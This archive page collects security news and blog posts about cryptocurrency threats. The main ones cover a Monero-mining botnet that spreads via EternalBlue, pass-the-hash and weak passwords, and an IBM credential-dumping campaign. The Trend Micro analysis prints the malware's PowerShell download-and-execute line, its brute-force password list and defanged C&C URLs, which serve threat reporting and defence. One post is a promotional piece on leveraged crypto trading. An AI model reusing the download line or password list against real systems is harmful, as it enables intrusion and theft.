Category Archives: cryptocurrency

Attackers Use EternalBlue and PowerShell Scripts to Spread Cryptomining Malware Across Asia

A cryptomining malware campaign originally discovered in January is now using the EternalBlue exploit to target users in Asia, according to security researchers.

The investigation by Trend Micro showed the campaign involves several different approaches to infect machines and avoid detection while it mines Monero, most of which involve taking advantage of older applications and obfuscated PowerShell scripts.

In addition to EternalBlue — an exploit developed by the National Security Agency (NSA) that was linked to the widespread WannaCry and NotPetya ransomware attacks three years ago — the cryptomining malware also uses open-source tools, such as PowerDump, Invoke-SMBClient and Server Message Block (SMB) v1 protocol.

The campaign currently targets users based in Japan, Hong Kong, Taiwan, India and Vietnam, the researchers said.

How Miner Malware Uses Pass the Hash

Threat actors behind the attacks start by trying a list of commonly used passwords, such as “123456” and “welcome,” to break into a machine and gain network access. The campaign also makes use of a technique known as pass the hash in which attackers steal credentials stored in memory to connect to a remote server. Other options have included attacking targets with weak passwords using the Invoke-WMIMethod PowerShell script or EternalBlue for those with stronger passwords.

Once a machine has been infected and the media access control (MAC) address has been captured, the cybercriminals behind the cryptomining malware campaign try to get ahead of detection attempts by scanning for any antivirus products that may be in use.

Researchers also discovered five different components that have been used as part of the campaign, including a larger copy of the malware — essentially a dropped Trojan — that can get past sandboxes, as well as a binary executable compiled using Python and other PowerShell scripts. An open-source tool known as Invoke-ReflectivePEIInjection is used to drop the XMRig cryptominer onto the compromised machines using its own PowerShell process, rather than storing it as a file.

Keep Cryptomining Malware Off Servers, Too

While targeting individual machines with cryptomining malware is commonplace, the researchers noted that those behind this campaign were also trying to break into database servers by searching for those using weak SQL passwords.

This is similar to a recent investigation from IBM X-Force Incident Response and Intelligence Services (IRIS), which showed cryptojacking infections that took advantage of misconfigured servers in multinational corporations. Besides patching vulnerable systems and closing ports on external servers, IBM experts also recommend disabling legacy protocols such as SMB v1 and keeping a close eye on any data that leaks out through SMB ports.

The post Attackers Use EternalBlue and PowerShell Scripts to Spread Cryptomining Malware Across Asia appeared first on Security Intelligence.

Top The Pirate Bay Alternatives – Best Torrent Download Sites (2019)

By Waqas

Looking for The Pirate Bay alternatives? You have come to the right place. The Pirate Bay (TPB) is one of the most visited torrent download websites in the world. However, lately, there has been an increase in its server downtime. Lately, the Dark web domain for The Pirate Bay is also offline. Moreover, The Pirate Bay was […]

This is a post from HackRead.com Read the original post: Top The Pirate Bay Alternatives – Best Torrent Download Sites (2019)

Online Cryptocurrency Trading Sites Need a Tech Boost

By all accounts, 2018 was a rough year for the cryptocurrency markets. Bitcoin, for example, fell from $20,000 to just under $3,000—a massive loss. And other coins followed suit, many losing more than 90% of their value from the all-time high. This blood-letting drove investors out of the marketplace, resulting in the ‘crypto-winter’.

However, as the market has begun to buoy, investors are returning and seeking platforms where they can trade cryptocurrencies. This movement back into the market has begun to expose some of the technical flaws that are currently putting traders at risk.

For example, in the recent Bitcoin price jump over $5,100, trading site Bitmex automatically closed out short positions for a number of traders in a process known as ‘auto-deleveraging’. The sudden closures liquidated more than $500 million in short positions—a massive tech glitch.

Moving toward solutions

Despite a tough 12 months, months that elicited questions of whether or not the market could ever recover, crypto is pushing forward. For example, technology in the crypto trading space is exploding.

This is possible due to the fact that the investor perspective has gradually shifted. Digital currencies are no longer considered a speculative, risky investment that may or may not carry any intrinsic value, they are now solidly legitimate assets that could even potentially overtake fiat as a monetary option.

The change in overall investor mindset has opened doors for advanced trading options and large-scale investments. The 2018 trading year also brought new trading options in the form of leverage trading platforms, derivatives, and futures.

Margin trading in cryptocurrency is still a relatively new endeavor and is certainly one of the riskier options available. However, the tremendous potential rewards can make it an appealing option for new and seasoned crypto traders alike. Regardless of experience level, it is critical to remember a few key points when selecting any platform.

Most reputable exchanges require two-factor authentications when opening an account. This is to mitigate the real risk of hacking posed by putting money into any exchange. The hacking issue is not going away and protecting oneself as much as possible is critical.

Additionally, research each potential platform thoroughly prior to jumping in. Every platform is different. Verification takes different times, leverage options are all over the place, and available pairs vary from platform to platform. Take the time to find out which exchange suits your specific needs.

New Solutions

One such platform is Monfex. Specifically configured for digital currency, the Monfex trading platform allows trading pairs from a variety of cryptocurrencies supported by the Monfex platform.

Currently, the US dollar can be traded against 12 different cryptocurrencies on Monfex. These include several top performers: Bitcoin, Bitcoin Cash, Dash, EOS, Ethereum and Ethereum Classic, Litecoin, Neo, OmiseGo, Ripple, Monero, and Zcash.

Each trading pair offers pre-selected leverage, typically 5x or 10x, but up to 50x. Bitcoin is the base asset across the platform. Once an account is established (which is quick and simple), a base amount of BTC deposited into the account, and an order type and size confirmed, a variety of trading positions become available.

Investors have the option to Buy or Sell, Long or Short, with a force close based on the amount of BTC in the investor’s account.

Other advantages offered by the Monfex platform include low commission at 0.075%, tight spreads, contracts are perpetual and divisible, and deep liquidity.

Veteran Exchanges

Other crypto margin exchanges and trading platforms are not new to the crypto space. However, they have reinvented themselves to meet the expanding demands of today’s crypto investor.

Kraken, for example has been around since 2011, practically an eternity in crypto time. It recently acquired a new trading platform interface, the OnChainFX dashboard. Additionally, Kraken has plans to launch a cryptocurrency bank, the first in the world.

Hong Kong based and US Virgin Island registered Bitfinex is yet another standby platform. The exchange supports nearly every type of input-output. Bitfinex is currently unavailable in the United States due to regulatory compliance issues that continue to plague US investors as a result of the increased attention from the SEC and other governing bodies. However, progress continues to be made in the international market for Bitfinex users.

For example, Bitfinex investors are no longer crippled by a minimum equity investment limit. Previously set at $10,000, Bitfinex removed the limit entirely in response to investor demands.

This announcement was presented alongside other news regarding platform infrastructure improvements. Bitfinex has also been working to provide investors with a Know Your Client (KYC) portal, sentiment analysis options, and an upgraded customer support center.

Conclusion

Trading cryptocurrency in derivatives and other lock option exchanges is an exciting prospect for investors, especially as 2019 brings positive movement across Bitcoin, Ethereum, and other top coins. Markets are responding to the changes and new exchanges like Monfex and others are providing solutions.

Investors can potentially see enormous returns, especially using leveraging options on these new platforms. Just be sure to thoroughly research the best option for you, and happy trading!

The post Online Cryptocurrency Trading Sites Need a Tech Boost appeared first on TechWorm.

Security Affairs: Malware campaign uses multiple propagation methods, including EternalBlue

Hackers are using the EternalBlue exploit and leveraging advantage of Living off the Land (LotL) obfuscated PowerShell-based scripts to deliver malware and a Monero cryptocurrency.

Security experts at Trend Micro have uncovered a malware campaign that is targeting Asian entities using the EternalBlue exploit and leveraging advantage of Living off the Land (LotL) obfuscated PowerShell-based scripts to deliver malware and a Monero cryptocurrency.

The threat actors behind this campaign leveraged the exploit leaked by the Shadow Brokers in 2017, the EternalBlue exploit was exploited by several families of malware, including WannaCry and NotPetya ransomware.

The same campaign was first observed in January by experts at Qihoo 360, at the time attackers hit Chinese targets leveraging the Invoke-SMBClient and the PowerDump open source tools.

Researchers observed that the recent attacks initially targeted Japanese users, later they also hit people in Australia, Taiwan, Vietnam, Hong Kong, and India.

“Instead of directly sending itself into all the systems connected, the remote command changes the firewall and port forwarding settings of the infected machines, setting up a scheduled task to download and execute an updated copy of the malware.” reads the analysis published by Trend Micro.

“The malware also uses the pass the hash method, wherein it authenticates itself to remote servers using the user’s hashed password. By using the Get-PassHashes command, the malware acquires the hashes stored in the machine, as well as the hashes of the weak passwords listed. After acquiring the hashes, the malware utilizes Invoke-SMBClient – another publicly available script – to perform file share operations using pass-the-hash.”

The malicious code also uses the pass the hash attack method, wherein it authenticates itself to remote servers using the user’s hashed password. The malicious code acquires the hashes stored in the machine by using the Get-PassHashes command, as well as the hashes of the weak passwords listed. The malware used the obtained hashes with the Invoke-SMBClient script to perform various file operations, such as deleting files dropped by older versions of the malware and gaining persistence by adding itself to the Windows Startup folder.

In case the victim has a stronger password, the malware leverages EternalBlue to propagate.

Once the malware has infected a machine, it will download an obfuscated PowerShell script from the command-and-control (C&C) server, that acts as dropper. The script also collects and exfiltrates the machine’s MAC address and the list of installed antimalware software.

“The downloaded PowerShell is a dropper, responsible for downloading and executing the malware’s components, most of which are copies of itself.” continues the analysis.

In the next stage, the malware will drop a Trojan strain detected by Trend Micro as TrojanSpy.Win32.BEAHNY.THCACAI that gathers other system information, including computer name, machine’s GUID, MAC address (again), OS version, graphics memory info, and system time.

The malware also downloads a PowerShell implementation of a Mimikatz tool, it also attempts to use weak SQL passwords to access vulnerable database servers, executing shell commands using xp_cmdshell upon access. This component scans IP blocks for vulnerable devices that attempt to exploit by using EternalBlue.

A fifth component is an XMRig Monero cryptominer that is deployed using PowerShell and injected into its PowerShell process using the open source Invoke-ReflectivePEInjection tool.

“Considering the increasing popularity of PowerShell and more publicly available open-source codes, we can expect to see more complicated malware like these.” concludes Trend Micro. “And while system information being collected and sent back to the C&C may appear insignificant compared to directly stealing personally identifiable information, system information is unique to machines and may be used to trace, identify, and track users and activities.”

Pierluigi Paganini

(SecurityAffairs – fingerprints, Genesis Store)

The post Malware campaign uses multiple propagation methods, including EternalBlue appeared first on Security Affairs.



Security Affairs

Malware campaign uses multiple propagation methods, including EternalBlue

Hackers are using the EternalBlue exploit and leveraging advantage of Living off the Land (LotL) obfuscated PowerShell-based scripts to deliver malware and a Monero cryptocurrency.

Security experts at Trend Micro have uncovered a malware campaign that is targeting Asian entities using the EternalBlue exploit and leveraging advantage of Living off the Land (LotL) obfuscated PowerShell-based scripts to deliver malware and a Monero cryptocurrency.

The threat actors behind this campaign leveraged the exploit leaked by the Shadow Brokers in 2017, the EternalBlue exploit was exploited by several families of malware, including WannaCry and NotPetya ransomware.

The same campaign was first observed in January by experts at Qihoo 360, at the time attackers hit Chinese targets leveraging the Invoke-SMBClient and the PowerDump open source tools.

Researchers observed that the recent attacks initially targeted Japanese users, later they also hit people in Australia, Taiwan, Vietnam, Hong Kong, and India.

“Instead of directly sending itself into all the systems connected, the remote command changes the firewall and port forwarding settings of the infected machines, setting up a scheduled task to download and execute an updated copy of the malware.” reads the analysis published by Trend Micro.

“The malware also uses the pass the hash method, wherein it authenticates itself to remote servers using the user’s hashed password. By using the Get-PassHashes command, the malware acquires the hashes stored in the machine, as well as the hashes of the weak passwords listed. After acquiring the hashes, the malware utilizes Invoke-SMBClient – another publicly available script – to perform file share operations using pass-the-hash.”

The malicious code also uses the pass the hash attack method, wherein it authenticates itself to remote servers using the user’s hashed password. The malicious code acquires the hashes stored in the machine by using the Get-PassHashes command, as well as the hashes of the weak passwords listed. The malware used the obtained hashes with the Invoke-SMBClient script to perform various file operations, such as deleting files dropped by older versions of the malware and gaining persistence by adding itself to the Windows Startup folder.

In case the victim has a stronger password, the malware leverages EternalBlue to propagate.

Once the malware has infected a machine, it will download an obfuscated PowerShell script from the command-and-control (C&C) server, that acts as dropper. The script also collects and exfiltrates the machine’s MAC address and the list of installed antimalware software.

“The downloaded PowerShell is a dropper, responsible for downloading and executing the malware’s components, most of which are copies of itself.” continues the analysis.

In the next stage, the malware will drop a Trojan strain detected by Trend Micro as TrojanSpy.Win32.BEAHNY.THCACAI that gathers other system information, including computer name, machine’s GUID, MAC address (again), OS version, graphics memory info, and system time.

The malware also downloads a PowerShell implementation of a Mimikatz tool, it also attempts to use weak SQL passwords to access vulnerable database servers, executing shell commands using xp_cmdshell upon access. This component scans IP blocks for vulnerable devices that attempt to exploit by using EternalBlue.

A fifth component is an XMRig Monero cryptominer that is deployed using PowerShell and injected into its PowerShell process using the open source Invoke-ReflectivePEInjection tool.

“Considering the increasing popularity of PowerShell and more publicly available open-source codes, we can expect to see more complicated malware like these.” concludes Trend Micro. “And while system information being collected and sent back to the C&C may appear insignificant compared to directly stealing personally identifiable information, system information is unique to machines and may be used to trace, identify, and track users and activities.”

Pierluigi Paganini

(SecurityAffairs – fingerprints, Genesis Store)

The post Malware campaign uses multiple propagation methods, including EternalBlue appeared first on Security Affairs.

TrendLabs Security Intelligence Blog: Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse

By Augusto Remillano II and Arvin Macaraeg

We detected a malware that uses multiple propagation and infection methods to drop a Monero cryptocurrency miner onto as many systems and servers as possible. Initially observed in China in early 2019, the methods it previously used to infect networks involved accessing weak passwords and using pass-the-hash technique, Windows admin tools, and brute force attacks with publicly available codes. However, this new case we found in Japan involves the use of the EternalBlue exploit and the abuse of PowerShell to break into the system and evade detection.

It appears that the attackers are now expanding this botnet to other countries; our telemetry has since detected this threat in Australia, Taiwan, Vietnam, Hong Kong, and India.

Propagation and Behavior

The malware’s (detected by Trend Micro as Trojan.PS1.LUDICROUZ.A) primary propagation technique involves trying a list of weak credentials to log into other computers connected to the network. Instead of directly sending itself into all the systems connected, the remote command changes the firewall and port forwarding settings of the infected machines, setting up a scheduled task to download and execute an updated copy of the malware. The downloaded PowerShell script is executed with

IEX (New-Object Net.WebClient).downloadstring(‘hxxp://v.beahh[.]com/wm?hp’)

 

123456

password

PASSWORD

football

welcome

1

12

21

123

321

1234

12345

123123

123321

111111

654321

666666

121212

000000

222222

888888

1111

555555

1234567

12345678

123456789

987654321

admin

abc123

abcd1234

abcd@1234

abc@123

p@ssword

P@ssword

p@ssw0rd

P@ssw0rd

P@SSWORD

P@SSW0RD

P@$$w0rd

P@$$word

P@$$w0rd

iloveyou

monkey

login

passw0rd

master

hello

qazwsx

password1

qwerty

baseball

qwertyuiop

superman

1qaz2wsx

fuckyou

123qwe

zxcvbn

pass

aaaaaa

love

administrator

Table 1. List of weak passwords used for primary propagation.

It also uses this list with Invoke-WMIMethod (detected by Trend Micro as HackTool.Win32.Impacket.AI) to gain remote access to other machines:

Figure 1. Invoke-WMIMethod for remote access to machines with weak passwords.

The malware also uses the pass the hash method, wherein it authenticates itself to remote servers using the user’s hashed password. By using the Get-PassHashes command, the malware acquires the hashes stored in the machine, as well as the hashes of the weak passwords listed. After acquiring the hashes, the malware utilizes Invoke-SMBClient – another publicly available script – to perform file share operations using pass-the-hash.

Figure 2. Malware using pass-the-hash technique to get the hash of the user’s password and hashes of the weak passwords.

If successful, it deletes the file %Start Menu%\Programs\Startup\run.bat, likely a dropped file of an older version of the malware. It also drops the following:

  • %Application Data%\flashplayer.tmp
  • %Application Data%\sign.txt – used to indicate that the machine is already infected
  • %Start Menu%\Programs\Startup\FlashPlayer.lnk – responsible for executing the script tmp at startup

If the user has a stronger password, the malware uses EternalBlue to propagate.

Figure 3. Exploit payload.

Once a machine is infected via one of the methods, the malware acquires the MAC address and collects information on the anti-virus products installed in the machine. It downloads another obfuscated PowerShell script (detected by Trend Micro as Trojan.PS1.PCASTLE.B) from the C&C server, and analysis revealed that the download URL sends back the information it acquired earlier to its handler. The downloaded PowerShell is a dropper, responsible for downloading and executing the malware’s components, most of which are copies of itself.

Figure 4. Routine for acquiring the MAC address and AV products installed by the malware.

To check whether the malware already installed its components it looks for the following files:

  • %Temp%\kkk1.log
  • %Temp%\pp2.log
  • %Temp%\333.log
  • %Temp%\kk4.log
  • %Temp%\kk5.log

Figure 5. Checking for installed malware components.

With each $flagX representing a component, the malware downloads a newer version of the PowerShell dropper script ($flag) and installs a scheduled task to run it regularly if it is still unset. The behavior of the malware depends on the privilege it was run. $flag2 also downloads a copy of the malware from a different URL and creates a differently named scheduled task.

Figure 6. $flag and $flag2 for scheduled tasks.

The third component (detected by Trend Micro as TrojanSpy.Win32.BEAHNY.THCACAI) is a dropped Trojan — a copy of itself in a larger file size, likely to evade sandboxes — that collects system information from the host:

  • Computer Name
  • Machine’s GUID
  • MAC Address
  • OS Version
  • Graphics Memory Information
  • System Time

The fourth component is a Python-compiled binary executable that further propagates the malware, also capable of pass the hash attacks by dropping and executing a PowerShell implementation of Mimikatz (detected by Trend Micro as Trojan.PS1.MIMIKATZ.ADW).

Figure 7. Dropping the fourth executable component.

Figure 8. Checking if the Mimikatz component is already installed, and executing Mimikatz.

The malware also attempts to use weak SQL passwords to access vulnerable database servers, executing shell commands using xp_cmdshell upon access. Like the main file, the component scans IP blocks for vulnerable devices that can be exploited using EternalBlue by reusing publicly available codes related to previous exploits.

Figure 9. Scanning for vulnerable database servers.

The fifth component is an executable that is downloaded and executed. However, the download URL was offline at the time of writing.

The malware’s payload — a Monero coinminer — is also deployed by PowerShell, but is not stored in a file. Instead, it is injected into its own PowerShell process with another publicly available code, Invoke-ReflectivePEInjection. After installation, the malware reports its status to the C&C server.

Figure 10. PowerShell script that downloads and executes the miner payload.

Figure 11. Executing the miner payload.

Conclusion

We found the malware sample to be sophisticated, designed specifically to infect as many machines as possible and to operate without immediate detection. It leverages weak passwords in computer systems and databases, targets legacy software that companies may still be using, uses PowerShell-based scripts with components downloaded and executed in memory, exploits unpatched vulnerabilities, and installs using the Windows startup folder and the task scheduler. Considering the increasing popularity of PowerShell and more publicly available open-source codes, we can expect to see more complicated malware like these. And while system information being collected and sent back to the C&C may appear insignificant compared to directly stealing personally identifiable information, system information is unique to machines and may be used to trace, identify, and track users and activities.

Figure 12. Malware’s new URL.

We recommend updating systems with available patches from legitimate vendors as soon as possible. Users of legacy software should also update with virtual patches from credible sources. As of this writing, the malware is still active and was updated, connecting to a new URL. Use complicated passwords, and authorize layered authentication whenever possible. Enterprises are also advised to enable a multi-layered protection system that can actively block these threats and malicious URLs from the gateway to the endpoint.

 

Indicators of Compromise

SHA256 Detection
3f28cace99d826b3fa6ed3030ff14ba77295d47a4b6785a190b7d8bc0f337e41 Trojan.PS1.MIMIKATZ.ADW
7c402add8feffadc6f07881d201cb21bc4b39df98709917949533f6febd53b6e Trojan.PS1.LUDICROUZ.A
aaef385a090d83639fb924c679b2ff22e90ae9377774674d537670a975513397 TrojanSpy.Win32.BEAHNY.THCACAI
e28b7c8b4fc37b0ef91f32bd856dd71599acd2f2071fcba4984cc331827c0e13 Trojan.PS1.PCASTLE.B
fa0978b3d14458524bb235d6095358a27af9f2e9281be7cd0eb1a4d2123a8330 HackTool.Win32.Impacket.AI

 

URLs

hxxp://down[.]beahh[.]com/c32.dat

hxxp://down[.]beahh[.]com/new.dat?allv5

hxxp://ii[.]ackng[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}

hxxp://log[.]beahh[.]com/logging.php?ver=5p?src=wm&target

hxxp://oo[.]beahh[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}

hxxp://p[.]beahh[.]com/upgrade.php

hxxp://pp[.]abbny[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}

hxxp://v[.]beahh[.]com/wm?hp

hxxp://v[.]y6h[.]net/g?h

hxxp://v[.]y6h[.]net/g?l

lplp1[.]abbny[.]com:443

lplp1[.]ackng[.]com:443

lplp1[.]beahh[.]com:443

 

Additional insights and analysis by Carl Maverick Pascual and Patrick Angelo Roderno.

The post Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse appeared first on .



TrendLabs Security Intelligence Blog

E Hacking News – Latest Hacker News and IT Security News: Electricity Wastage Leading to a Ban on Cryptocurrency Mining in China



In the wake of cryptocurrency mining being listed as one of the hazardous and wasteful activities by China’s central state planner, the National Development and Reform Commission, Chinese government has decided to ban cryptocurrency mining in the country. China, after remaining the hub of bitcoin mining has now plans drafted to terminate the activity.

The list generated by China’s central state planner included more than 450 activities  which failed to abide by the regulations  and are categorized unsafe for either they lead to a wastage of resources or pollutes the environment.  

Drawing inferences from an anonymous Chinese bitcoin trader, Reuters noted, “Bitcoin mining wastes a lot of electricity,”

Bitcoin, one of the most popular cryptocurrency hit a record high by the end of 2017 and touched $5,000 for the first time ever since November.  This week, it was down by 1.4 percent along with Ripple’s XRP and Ethereum, which fell down by the same margin.

Lately, cryptocurrency has been under inspection in China and eventually, it led to the banning of initial coin offerings and shutting down of local trading exchanges. With electricity being a crucial factor determining the ban, countries with inexpensive electricity have now emerged as the key hosts of cryptocurrency mining.





E Hacking News - Latest Hacker News and IT Security News

Electricity Wastage Leading to a Ban on Cryptocurrency Mining in China



In the wake of cryptocurrency mining being listed as one of the hazardous and wasteful activities by China’s central state planner, the National Development and Reform Commission, Chinese government has decided to ban cryptocurrency mining in the country. China, after remaining the hub of bitcoin mining has now plans drafted to terminate the activity.

The list generated by China’s central state planner included more than 450 activities  which failed to abide by the regulations  and are categorized unsafe for either they lead to a wastage of resources or pollutes the environment.  

Drawing inferences from an anonymous Chinese bitcoin trader, Reuters noted, “Bitcoin mining wastes a lot of electricity,”

Bitcoin, one of the most popular cryptocurrency hit a record high by the end of 2017 and touched $5,000 for the first time ever since November.  This week, it was down by 1.4 percent along with Ripple’s XRP and Ethereum, which fell down by the same margin.

Lately, cryptocurrency has been under inspection in China and eventually, it led to the banning of initial coin offerings and shutting down of local trading exchanges. With electricity being a crucial factor determining the ban, countries with inexpensive electricity have now emerged as the key hosts of cryptocurrency mining.



Credential Dumping Campaign Hits Multinational Corporations

Server Misconfigurations Result in Ongoing Theft of Corporate Credentials, Cryptojacking Infections on User and Enterprise Assets

IBM X-Force Incident Response and Intelligence Services (IRIS), our team of veteran incident response and intelligence professionals, responds to cyberattacks taking place in different parts of the globe.

In a recent investigation, our team discovered that multinational corporations in various sectors are being targeted by attackers using malicious scripts to automate attacks on misconfigured servers. The attacks resulted in a continuous credential dumping campaign that exfiltrated the corporate credentials of infected network users. On the other side of the compromised servers, attackers continue to operate a public File Transfer Protocol (FTP) server that collects credentials from additional compromised networks and then sends them to a third host, presumably into the attackers’ hands for later use.

On top of the credential theft, the attackers behind this campaign infect devices with cryptocurrency miners.

Let’s examine the technical details of this live campaign to shed more light on attacker tactics, techniques and procedures (TTPs) and outline some tips to help defenders prevent this sort of active leak.

IBM X-Force duly reported this ongoing operation to law enforcement in the corresponding jurisdictions.

Automation and Windows OS Tools Make for a Stealthy Operation

In a malicious campaign X-Force IRIS discovered in February 2019, the team found that some of the top adversarial tactics reported by IBM to target organizations in the wild are being actively used against unsuspecting organizations:

  • Exploiting misconfigured servers and Windows-based client-side operating systems;
  • Living off the land by using embedded operating system tools; and
  • Automating attacks using malicious PowerShell scripts.

The attack campaign harvests corporate credentials from a number of compromised networks, most likely due to the same reason across the board: server misconfiguration leaving various ports open and unprotected and weak administrator passwords without second-factor authentication enforced.

The attackers in this ongoing campaign are using PowerShell scripts and automation to exploit the servers with the DoublePulsar kernel exploit. They also take advantage of Transmission Control Protocol (TCP) port 445 for communicating with the network — a Server Message Block (SMB) ports that has been exploited in previous attacks, including WannaCry and NotPetya, for lateral movement.

A look at the distribution of victimized devices reveals that while most of them could be user devices (Win7), the second-most targeted asset type is Windows Server 2008.

IBM X-Force

Figure 1: Distribution of affected devices per OS version

Multistage Malicious Script Fetches and Runs Malware Files

To get to network users and harvest their credentials, the attackers in this campaign begin with a malicious script. The script fetches and runs additional files via PowerShell, enabling it to use Mimikatz and PowerSploit on the targeted devices to dump the user’s credentials.

An excerpt of the script appears below (please note that this article does not provide a comprehensive analysis of the malicious service’s installation script).

IBM X-Force

Figure 2: Malicious script installs attacker’s Windows service

The overall goal of the script is to fetch additional malcode from various rogue hosts maintained by the attackers. Below are two of the main components of the attacks:

  1. s.txt
  2. up.txt

We can see those being pulled from a remote server hosted on hxxp://74.222.1.38. With WhoIs data being protected, we could only note that the host is a dedicated server infrastructure likely rented out by the attackers or exploited for their attacks.

IBM X-Force

Figure 3: Malicious script installs attacker’s Windows service

A Closer Look at Malicious File ‘Up.txt’

Looking into the activity launched by the extra files fetched into the compromised devices, we could see that the code is executed and performs the following actions:

  • Collects the private and public IP address of the infected device and identifies the public IP address via hxxp://2019.ip138.com/ic.asp.
  • Enumerates the device’s OS version and live processes from the system using WMI queries.
  • Downloads and executes Mimikatz from GitHub.
  • Creates an output file with process information and dumped credentials. File names attributed to each file are structured as follows: PublicIP_PrivateIP_OSVersion_CPUload.txt. For example: 79.XXX.XX.12_192.168.37.147_Microsoft Windows 7 Ultimate [6.1.7601]_5%.txt.
  • Uploads output file to a public FTP server using the attacker’s hardcoded credentials.

While the attacker placed their hardcoded credentials to the malicious FTP in plain view, they ensured that unwelcome access would receive read-only rights. That means outsiders cannot grab existing content on the FTP server.

Output files containing stolen system information and network credentials arrive at the FTP server but only remain there for a few seconds before being exfiltrated onward to another server and deleted from the FTP server.

How Much Is Too Much? Campaign Statistics

Statistics of uploaded data to the malicious FTP server show that the activity is generating a large number of uploads from compromised devices. While the number of uploads is large, file sizes are very small, likely because they only contain a few strings of textual information. The following image shows the accumulation of data on the public FTP server within 60 seconds:

Data theft rate in 60 seconds

Figure 4: Rapid accumulation of victims’ stolen data on public FTP server

Judging by the number of unique IP addresses from which the data is being streamed into the attackers’ FTP — close to 85,000 IPs — we are seeing that the scope of the campaign is meaningful.

The following numbers accumulated over the period of 11 days provide further context about the size of this malicious operation:

Description

Number

Affected countries per IP geo-location analysis.

180 – ongoing

Files uploaded from infected devices.

1,663,156 – ongoing

Unique IP addresses uploading stolen data.

84,683 – ongoing

Files exfiltrating large amounts of data.

59,688 – ongoing

Files exfiltrating small amounts of data.

933,994 – ongoing

The campaign’s scope can be estimated through the number of uploads per day, showing many devices are likely compromised in each organization.

Data drops per dayFigure 5: A sample of campaign dates showing the scope of stolen data dropped daily

A view of the location of infected devices affected by this campaign reveals that the largest number is located in China, Taiwan and Russia. This may be part of a nation-sponsored campaign by regional threat actors targeting organizations and government entities in Asia.

Country distirbution of campaign

Figure 6: Campaign’s country distribution per geo-IP location

All in an Attacker’s Workday

The TTPs used in this malicious campaign by unknown attackers are almost taken from an attacker’s playbook. Using automated tools, living off the land, using PowerShell and infecting devices with cryptominers are the top tactics highlighted by IBM X-Force’s “Threat Intelligence Index.”

Below are some tips to protect assets against this sort of attack and help prevent initial access to externally facing servers and user devices:

  • Ensure systems are fully patched.
  • Perform regular vulnerability scans to identify missing security updates.
  • Keep antivirus and anti-malware solutions up to date and configure them to automatically conduct regular scans.
  • Manage usage of privileged accounts. Implement the principle of least privilege. Do not assign administrative access to users unless absolutely needed.
  • Enhance security of WMI by authorizing WMI users and restricting permissions.
  • Enable host-based firewalls and restrict internal communications to limit unnecessary lateral movement.
  • Close ports on externally facing servers.
  • If ports remain open, secure them with the necessary controls or place compensating controls as needed.
  • Monitor communication via SMB ports to external servers and investigate suspicious cases of data regularly leaving the organization.
  • Disable SMB v1 and similar legacy protocols completely.

Campaign IoCs

This malicious activity is still ongoing at the time of this writing. Security professionals who wish to use indicators of compromise (IoCs) from the campaign to defend their networks can receive additional data via X-Force Exchange.

The post Credential Dumping Campaign Hits Multinational Corporations appeared first on Security Intelligence.

Samsung Galaxy S10’ biometric sensor hackable with copy of owner’s fingerprint

By Waqas

The fingerprint security feature of Samsung Galaxy S10 and S10+ has been hacked using only a 3D printer and printed fingerprint of the owner. The hack can be carried out without the presence of the actual owner since a printed copy of the fingerprints is used. When evaluated by security researchers it was confirmed that […]

This is a post from HackRead.com Read the original post: Samsung Galaxy S10’ biometric sensor hackable with copy of owner’s fingerprint

Cryptojacking Attacks: Who’s Mining on Your Coin?

Data from the “IBM X-Force Threat Intelligence Index” for 2018 illustrated that threat actors have been increasingly using malicious cryptomining, aka cryptojacking attacks, to easily monetize their access to systems with minimal risk. The 2019 report showed that threat actors continue to use these attacks to compromise systems and generate a revenue stream.

There are two types of cryptomining attacks that have been making the rounds since 2018:

  1. Malicious mining via compromised websites, also known as cryptojacking. This activity takes place in-browser.
  2. Malware-based cryptomining attacks on a user’s device. This activity relies on the device’s central processing unit (CPU) power.

In 2018, X-Force saw a majority of browser-based mining versus the malware-based variety. In fact, our data shows a nearly 2-1 ratio, respectively. This attack tactic is becoming a rising issue; cryptojacking presents a unique challenge for organizations to detect and mitigate because malicious scripts are almost always hosted outside the organization’s zone of control.

Cryptojacking definitely trended in 2018, but are tides about to turn? X-Force data from late 2018 and early 2019 showed that browser-based cryptojacking attacks are on the decline while also revealing a notable increase in malware-based attacks.

Cryptomining Malware: A Primer

The value and popularity of cryptocurrency have been growing across the globe, and criminals are always looking for ways to generate passive income. One of the ways they tie the two together is by using coin-mining malware. Research from X-Force has addressed cryptocurrency miners before. To review, cryptominers are placed on an infected machine or device and use its native processing power to mine for cryptocurrency.

Historically, threat actors have targeted individual user boxes to drop cryptocurrency miners on, but recent research from X-Force Incident Response and Intelligence Services (IRIS) suggested that since at least 2017, threat actors have also tried to infect targeted internet of things (IoT) devices despite their low processing power.

What Could Be Driving a Shift to Cryptojacking?

Why would threat actors use malicious cryptomining instead of focusing on other attacks such as ransomware, for example? Threat actors can see some success in getting their malware on user devices, but for those motivated by monetary gain, converting that access into spendable currency has always been a challenge.

Over time, cybercriminals have tried different methods, such as selling stolen data, locking a device and demanding ransom payment from its owner, and selling a remote shell to the compromised device to other threat actors who can then deploy their own attack tactics on that device.

All of these tactics primarily require other people to become involved in their success — an option most criminals prefer to forego if only to avoid sharing the spoils. But they can’t sell access or data without a buyer, nor can they profit from ransomware without someone on the other end willing to pay. To minimize interaction with other parties, including victims who may or may not pay, many criminals evidently prefer cryptojacking. These attacks are suited for cybercriminals at any skill level, do not require much in terms of interaction with third parties and can be monetized relatively easily when compared with malware operations such as ransomware and banking Trojans.

To get into user devices, threat actors often deploy cryptomining malware via command injection attacks against enterprise-level assets, such as vulnerable applications in content management systems (CMSs). In instances observed by X-Force IRIS, attackers have attempted to plant malicious images on victims’ machines using wget and curl shell commands when victims simply visit a malicious page via a link in an email or through a compromised site.

2018: The Rise of Cryptomining in the Browser

Browser-based cryptojacking involves a threat actor infecting a web server or website and then injecting a cryptomining script into an otherwise legitimate website. Alternatively, the script can be inserted into an online advertisement, whether malicious or wholly illegitimate, and used with a legitimate ad service so that the script runs every time the browser is open.

